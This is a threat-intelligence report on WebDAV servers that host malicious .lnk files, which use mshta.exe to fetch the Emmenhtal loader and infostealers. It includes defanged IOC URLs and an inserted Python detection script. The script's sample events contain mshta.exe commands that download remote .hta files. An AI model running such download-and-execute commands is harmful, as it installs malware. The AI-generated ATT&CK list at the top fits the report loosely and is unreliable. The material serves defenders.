WebDAV-as-a-Service: Exploring the Infrastructure of Emmenhtal Loader Distribution

Short Summary:

This report discusses the ongoing monitoring of the Emmenhtal loader, a stealthy malware loader used for distributing various infostealers. The analysis highlights the use of WebDAV technology for hosting malicious files, the diverse range of malware delivered, and the potential for this infrastructure to be offered as a service to multiple threat actors.

Key Points:

  • The Emmenhtal loader, also known as PeakLight, operates in a memory-only manner, making it difficult to detect.
  • WebDAV technology is utilized to host malicious files, facilitating the distribution of the Emmenhtal loader.
  • Malicious “.lnk” files are used to trigger downloads of the loader via the legitimate “mshta.exe” binary.
  • A wide variety of malware families, including SelfAU3, DarkGate, and Amadey, have been identified in the infrastructure.
  • The infrastructure may be part of a broader “Infrastructure-as-a-Service” (IaaS) model for cybercriminals.
  • Consistent use of specific Autonomous Systems (AS) suggests a reliable hosting arrangement for the malware distribution.
  • The report emphasizes the need for ongoing vigilance and defensive measures against this evolving threat.

MITRE ATT&CK TTPs – created by AI

  • Execution (T1203)
    • Exploitation of vulnerabilities in software to execute malicious code.
  • Command and Control (T1071)
    • Use of application layer protocols for command and control communication.
  • Persistence (T1053)
    • Scheduled task/cron job to maintain persistence.
  • Credential Access (T1003)
    • Credential dumping to obtain user credentials.
  • Exfiltration (T1041)
    • Exfiltration over command and control channel.

This report was originally published for our customers on 30 August 2024.

Introduction

Since December 2023, the Sekoia TDR team has monitored a specific infrastructure involved in the distribution of the Emmenhtal loader. Emmenhtal is a stealthy malware loader known for its effectiveness in distributing various commodity infostealers worldwide. This loader has attracted attention from cybersecurity researchers, with detailed analyses provided by Orange Cyberdefense and Google Cloud’s Threat Intelligence team.

The Emmenhtal loader, also known as PeakLight, operates in a memory-only manner, making it difficult to detect and analyse. It is primarily used to distribute other malicious payloads, including well-known infostealers that target sensitive information.

This blogpost begins by examining the use of WebDAV technology in hosting malicious files related to the Emmenhtal loader, then analyses the various final payloads delivered through this infrastructure, and concludes by exploring the possibility that the infrastructure is being offered as-a-service to multiple threat actors.

Use of WebDAV technology for malicious file hosting

In our investigation of the infrastructure distributing the Emmenhtal loader, TDR analysts identified the use of WebDAV (Web Distributed Authoring and Versioning) technology to host malicious files. WebDAV, an extension of the HTTP protocol, allows for the management of files on web servers, including uploading, editing, and deleting files remotely. Even though WebDAV has legitimate applications in collaborative environments, threat actors have increasingly leveraged this technology to facilitate malicious activities.

The Emmenhtal loader, first detailed by Orange Cyberdefense for its role in distributing commodity infostealers, was later analysed by Google Cloud’s Threat Intelligence team, which uncovered its sophisticated memory-only execution strategy under the name PeakLight. These analyses underscore the significant and evolving threat posed by Emmenhtal as it continues to deliver new infostealers.

In one of the infection chains described by Orange Cyberdefense and Google, the user is initially redirected to the WebDAV server through a drive-by compromise while visiting certain websites. This results in an explorer.exe window opening a view of the WebDAV share where the malicious files are hosted. Since the end of 2023, Sekoia.io has identified more than 100 malicious WebDAV servers belonging to this infrastructure.

In the infrastructure Sekoia analysed, the malicious files were hosted within the “/Downloads” directory on a WebDAV server, an open directory where all files are accessible. The files predominantly consisted of “.lnk” files, which were weaponised to download further malicious payloads using the “mshta.exe” binary, a legitimate Microsoft executable designed to execute Microsoft HTML Application (HTA) files.

The use of “mshta.exe” to download and execute malicious payloads is a known technique among cybercriminals. By utilising a trusted system binary like “mshta.exe”, threat actors can bypass certain security controls and achieve a higher degree of stealth in their operations. Once the “.lnk” file is executed, “mshta.exe” is invoked to retrieve the Emmenhtal loader, which is most often hosted on separate infrastructure, adding complexity to the attack chain.

This method of using WebDAV to host malicious “.lnk” files that trigger the download of Emmenhtal via “mshta.exe” is an evasive tactic. Separating the server hosting the initial “.lnk” files from the payload server hinders detection and attribution efforts, making it a preferred strategy among advanced threat actors.
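The chain above (a “.lnk” opened from a WebDAV share, which launches “mshta.exe” with a remote location) gives defenders a simple process-creation signal. The following is an added example, not code from the report: it triages constructed Sysmon-style events for mshta.exe started with an HTTP URL or a WebDAV UNC path and extracts the remote host for blocking or enrichment. The sample events, the 192.0.2.10 address and the field names are all constructed for the example.

```python
import re

# Constructed sample process-creation events (not taken from the report).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" http://192.0.2.10/Downloads/test.hta'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe \\192.0.2.10@80\DavWWWRoot\Downloads\Invoice.pdf.hta'},
    # Benign: mshta.exe run against a local HTA by an installer.
    {"parent": r"C:\Program Files\App\app.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\App\setup.hta"},
    # Benign: unrelated process touching a .lnk file.
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\u\Downloads\test.lnk"},
]

# A remote location on the command line: an HTTP(S) URL, a UNC path (\\host\...)
# or the DavWWWRoot marker used by the Windows WebDAV redirector.
REMOTE_ARG = re.compile(r"https?://|\\\\[^\\\s]+\\|DavWWWRoot", re.IGNORECASE)

# Host extraction: group 1 for URLs, group 2 for UNC paths (stops at '@port').
HOST = re.compile(r"https?://([^/\s:]+)|\\\\([^\\@\s]+)", re.IGNORECASE)


def is_suspicious_mshta(event):
    """True when the image is mshta.exe and its arguments point to a remote location.

    Explorer as parent is typical of a double-clicked .lnk, but any parent is
    flagged: the remote argument is the discriminating feature."""
    if not event["image"].lower().endswith(r"\mshta.exe"):
        return False
    return REMOTE_ARG.search(event["cmdline"]) is not None


def remote_host(cmdline):
    """Return the remote host referenced by an mshta.exe command line, or None."""
    match = HOST.search(cmdline)
    if match is None:
        return None
    return match.group(1) or match.group(2)


def triage(events):
    """Return the command lines of all events worth an analyst's attention."""
    return [e["cmdline"] for e in events if is_suspicious_mshta(e)]


if __name__ == "__main__":
    for cmdline in triage(SAMPLE_EVENTS):
        print(f"suspicious mshta launch -> host {remote_host(cmdline)}: {cmdline}")
```

In a SIEM the same logic maps to a rule on image name plus a command-line pattern; the host extracted here is what you would pivot on against the WebDAV server list.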

Detailed analysis of malware delivered via WebDAV

Our analysis uncovered a wider range of malware distributed via this infrastructure than previously reported. The malware families identified, such as SelfAU3, DarkGate, and Amadey, demonstrate the infrastructure’s versatility. Each payload was delivered through a WebDAV-hosted “.lnk” file; the malicious URLs below are defanged to avoid direct exposure. The identified malware families and the corresponding URLs are listed in the following table:

Malware family                                URL
SelfAU3                                       91[.]92[.]251[.]35/Downloads/solaris-docs[.]lnk
DarkGate                                      206[.]188[.]196[.]28/Downloads/example[.]lnk
Amadey                                        147[.]45[.]79[.]82/Downloads/qqeng[.]pdf[.]lnk
Lumma                                         91[.]92[.]243[.]198:81/Downloads/test[.]lnk
Remcos                                        89[.]23[.]107[.]244/Downloads/Test[.]lnk
MeduzaStealer                                 94[.]156[.]64[.]74/Downloads/SecretTeachings[.]pdf[.]lnk
DANABOT                                       151[.]236[.]17[.]180/Wire%20Confirmation/WireConfirmation[.]pdf[.]lnk
ACR Stealer                                   62[.]133[.]61[.]104/Downloads/test[.]pdf[.]lnk
Asyncrat                                      62[.]133[.]61[.]101/Downloads/Invoice[.]pdf[.]lnk
Stealit                                       62[.]133[.]61[.]37/Downloads/config[.]txt[.]lnk
Cryptbot                                      89[.]23[.]103[.]56/Downloads/Videof/Full%20Video%20HD%20%281080p%29[.]lnk
XWORM                                         62[.]133[.]61[.]73/Downloads/Photo[.]lnk
Bash file dropping ZgRAT, DCRAT, PureLogs, XWORM   147[.]45[.]50[.]214/Downloads/demo[.]pdf[.]lnk
DEERSTEALER                                   92[.]118[.]112[.]253/Downloads/releaseform[.]pdf[.]lnk
Guloader                                      89[.]23[.]107[.]67/Downloads/2023-Documents%20Shared[.]lnk
Redline                                       147[.]45[.]50[.]57/Downloads/INVOICE%20340138551[.]pdf[.]lnk

Table: Malware families and their corresponding URLs

The discovery of these additional malware families highlights the evolving nature of the threat landscape associated with the Emmenhtal loader.

Infrastructure assumptions and observations

Based on our analysis and the diversity of malware observed, it is plausible that the WebDAV infrastructure described above is part of a broader cybercriminal operation offering “Infrastructure-as-a-Service” (IaaS) to other threat actors. This hypothesis is supported by several key observations:

  1. Diversity of final payloads: The wide range of malware families delivered through this infrastructure suggests that multiple threat actors are utilising the same service. The distribution of various malware, such as SelfAU3, DarkGate, and Amadey, among others, indicates a shared infrastructure being rented or leased to different cybercriminals with varying objectives.
  2. Presence of test files: Since December 2023, we have consistently observed the presence of “test” files within the infrastructure. These files likely represent attempts by clients to validate the reliability and effectiveness of the service before deploying their actual payloads. The use of test files is common in IaaS models, where customers wish to ensure the functionality of the infrastructure they are purchasing.
  3. Consistency in autonomous systems (AS): There has been a notable consistency in the Autonomous Systems (AS) used to host the WebDAV servers associated with this infrastructure. This consistency further supports the theory of a centralised service being offered. Below is a list of the AS providers and the approximate date they were first observed:
    • Terasyst Ltd (AS31420): Observed from February 2024
    • Zonata – Natskovi & Sie Ltd. (AS34368): Observed from February 2024
    • BL Networks (AS399629): Observed from February 2024
    • ICDSoft Ltd. (AS8739): Observed from March 2024
    • OOO Freenet Group (AS2895): Observed from April 2024
    • Perviy TSOD LLC (AS48430): Observed from April 2024
    • GLOBAL INTERNET SOLUTIONS LLC (AS207713): Observed from May 2024

The repeated use of specific AS providers over several months suggests that the threat actor(s) behind this infrastructure have established a reliable hosting arrangement, potentially as part of a larger IaaS offering. This consistency in hosting environments might also be indicative of a deliberate choice to evade detection by rotating among a select group of trusted providers.

Conclusion

The findings presented in this report suggest that the infrastructure used to distribute the Emmenhtal loader is likely part of a commercial service offered by a cybercriminal group. The presence of multiple malware payloads, consistent testing activities, and the reuse of specific Autonomous Systems for hosting all point towards a sophisticated operation designed to cater to multiple clients. As this infrastructure continues to evolve, it poses a significant and ongoing threat, necessitating continued vigilance and targeted defensive measures by cybersecurity professionals.

Our clients can access detailed information on the observed activities, related threat indicators, and ongoing monitoring efforts directly through our platform. We remain committed to tracking this infrastructure over time and will provide continuous updates as new developments emerge.

IOCs

